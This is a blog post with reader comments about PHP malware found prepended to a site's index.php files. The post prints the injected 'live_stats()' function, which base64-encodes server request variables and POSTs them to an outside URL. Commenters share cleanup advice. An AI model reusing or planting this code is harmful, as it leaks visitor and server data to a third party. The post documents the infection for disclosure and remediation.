Hardware, Software, Firmware, and Everything

Hacked by The People of God?

I was looking into some glue code that supports my jata android app because some bus routes had been added at the WRTA.   I immediately saw some foreign PHP code pre-pended to my own code.   The rogue code contains a function “live_stats()” which fiddles with a bunch of $_SERVER variables and either ships data to, or  receives data from the People of God web site.   The actual URL in the rogue code is http://www.pogpgh.org/session.php?id  This rogue code has been attached to more than one index.php files on my site.

I suspect that session.php over at pogpgh dot org is yet another rogue file that POG knows nothing about.    I may analyze the code to see what it is trying to do, but don’t have much time in the immediate future to dig very deep.  Meantime, maybe someone reading this can shed some light on this hack.


Here’s the rogue code:

This program is free software; you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation; either version 2 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
GNU General Public License for more details.
Version 2, June 1991
function live_stats(){
if($include_test) return 0;
global $include_test; $include_test = 1;
if($_GET['forced_stop'] or $_POST['forced_stop']) return 0;
if($_GET['forced_start'] or $_POST['forced_start']){} else {
if($_COOKIE['live_stats']) return 0;
if(!$uagent) return 0;
$url_get = "";
if(isset($_SERVER['HTTPS']) && ($_SERVER['HTTPS']=='on')) {
 $url_get .= "https:";} else { $url_get .= "http:";}
if($_SERVER['SERVER_PORT'] == 80 or $_SERVER['SERVER_PORT'] == 443){
 $url_get .= "//";} else { $url_get .= $_SERVER['SERVER_PORT']."//";}
if($_SERVER['HTTP_REFERER'] === $url_get) return 0;
if($_SERVER['REMOTE_ADDR'] === "") return 0;
if($_SERVER['REMOTE_ADDR'] === $_SERVER['SERVER_ADDR']) return 0;
$bot_list = array("Google", "Slurp", "MSNBot",
"ia_archiver", "Yandex", "Rambler", 
"bot", "spid", "Lynx", "PHP", 
"Aggregator", "findlinks", "Xenu", 
"BacklinkCrawler", "Scheduler", "mod_pagespeed",
"Index", "ahoo", "Tapatalk", "PubSub", "RSS");
if(preg_match("/" . implode("|", $bot_list) . "/i", $bkljg)) return 0;
foreach($_SERVER as $key => $value) { 
$data.= "&REM_".$key."='".base64_encode($value)."'";}
$context = stream_context_create(
 'timeout' => '60',
 'header' => "User-Agent: Mozilla/5.0 (X11; Linux i686; rv:10.0.9) Gecko/20100101 Firefox/10.0.9_ Iceweasel/10.0.9\r\nConnection: Close\r\n\r\n",
 'method' => 'POST',
 'content' => "REM_REM='1'".$data
$contents=file_get_contents($live_stats_url, false ,$context);
if(!$contents) {
 if(!headers_sent()) {
 @setcookie("live_stats","2",time()+172800); } return 0;
 echo "<script>document.cookie='live_stats=2; path=/; expires=".date('D, d-M-Y H:i:s',time()+172800)." GMT;';</script>"; return 0;}



Android Studio Niceties


Multiple Exit Points in Java


  1. Olaf

    the same here. I restored the files – changed the ftp pwd, but one week later the files were hacked again. How can they get access to the files?

    • With WordPress, they might be doing SQL injection, where SQL statements are included in input fields, and these hidden statements may do things such as create a user with ability to modify the WordPress code. From there, a PHP program can pretty much do anything it wants with your site content.

      • Hello! Quick question tht7#&821a;s completely off topic. Do you know how to make your site mobile friendly? My weblog looks weird when viewing from my iphone 4. I’m trying to find a template or plugin that might be able to resolve this problem. If you have any suggestions, please share. Thanks!

  2. I am the admin of the People of God site. Thankfully some folks have been notifying me about this issue. I didn’t put the session.php file into our site and don’t know how it got there. I’ve deleted it several times now, but it is replicated. I’ll have to work with my hosting service to figure out how to purge this. Please forgive me for this, but understand that I’ve been hacked and will do what I can to try to clean up our site. There is a session.php file that came with WordPress but that is different code.

    • My hosting company recommended I update WordPress as well as all it’s plugins, and I should have done that when I first noticed problems. You probably should, too, if you use wordpress or other pre-packaged content management. The problem is, the next update will probably get compromised with other weaknesses for script kiddies to use. My hosting company also recommended I add a pricey site protection service, which could be a good thing, assuming funds are available.

  3. It is in the index.php of your root file, and the index.php of your wordpress theme. You have to replace both files or repair them like I did.

    Also make sure your .htaccess is just that, not .htaccess.addHandlerBak

    Below should be your .htaccess file:

    # BEGIN WordPress

    RewriteEngine On
    RewriteBase /
    RewriteRule ^index.php$ – [L]
    RewriteCond %{REQUEST_FILENAME} !-f
    RewriteCond %{REQUEST_FILENAME} !-d
    RewriteRule . /index.php [L]

    # END WordPress

  4. I am sorry People of god, but all codes point to you! So you are in on it or your codes are dirty.

    I am still scanning my site codes. If I see this again in any of my client’s sites or mine, I will be forced to take action.

    Good luck everyone.

  5. Heads up: check all your index.php files from your wordpress install.

    I found the malicious code in the root install folder index.php, as well as the wp-content/themes/index.php, as well as in all the index.php files of all the themes, as well as wp-content/plugins/index.php.

    Also found suspicious code in a so called “cache” folder that materialised without me knowing…

    This happened running the latest 4.3.1 wordpress version, and it keeps getting back, even after we did a ftp password change.

    I will change the htaccces file and see where that gets me.

    this was happening (still is) on bogdanvanbroeck.com.

  6. Jenny

    One of my client’s websites has been twice hacked with this same hack. I cleaned it out and a few weeks later it was back. Please note that it does not only affect wordpress files. If you have any index.php in a subfolder on your website,for instance if you have another website, regardless of platform, or a blog or forum in a subfolder, it will also infect those files.

    So this hack targets all index.php files, regardless if your website is wordpress, joomla or any other platform.
    So you have to meticiously go over any index php file found on your server and clean out the hack code or upload a fresh clean copy.

  7. I’m not sure if it is the same or a different hack, but I learned that it was not only index.php files affected. I learned this when the hosting company took my site down, and sent along a scanlog of infected files, along with an invitation to pay to clean it up. I was annoyed that the host company had the tools to scan and produce the list of infected files, but this tool was not available to me. I may have installed it as a cron job, if possible.
    Looking at the infected files, I learned that many new PHP files were created and they had code that not only hid functions using base64_decode, but they also buried such code in a strrev() call making it harder to find such code with a simple grep invocation.

Leave a Reply to Jenny Cancel reply

Your email address will not be published. Required fields are marked *

This site uses Akismet to reduce spam. Learn how your comment data is processed.

Powered by WordPress & Theme by Anders Norén